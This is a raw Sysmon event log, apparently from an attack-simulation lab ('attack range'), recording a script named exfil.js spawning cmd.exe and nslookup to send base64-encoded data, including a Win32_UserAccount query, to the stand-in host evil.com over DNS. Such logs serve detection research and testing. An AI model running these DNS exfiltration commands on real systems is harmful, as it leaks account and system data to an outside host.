14:21:41.020{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-EC44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-18E0-629A-6742-000000005F02}39763212C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-EC44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.031{2E1864BB-18F5-629A-EC44-000000005F02}4580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljtqoo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlokubp.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-18F4-629A-EA44-000000005F02}64047432C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-EB44-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-EB44-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.004{2E1864BB-18F4-629A-E944-000000005F02}77527464C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-EB44-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.006{2E1864BB-18F5-629A-EB44-000000005F02}3864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-E944-000000005F02}7752C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlokubp.tmp 2>&1 23542300x800000000000000044811Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:41.033{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152A8AA56CCBF99469D1F469510510BB,SHA256=7FEBAAC113C4E6FF5010E382A6A3B79CA4787EFF1DEA4EF9F43F5E473E0E5498,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.992{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3845-000000005F02}7468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.992{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3845-000000005F02}7468C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.986{2E1864BB-18F6-629A-3845-000000005F02}74688064C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3745-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.971{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3845-000000005F02}7468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3745-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-18E0-629A-6742-000000005F02}39764128C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-3745-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.967{2E1864BB-18F6-629A-3745-000000005F02}4280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnec.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.955{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljinz.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-18F6-629A-3545-000000005F02}66044344C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3645-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 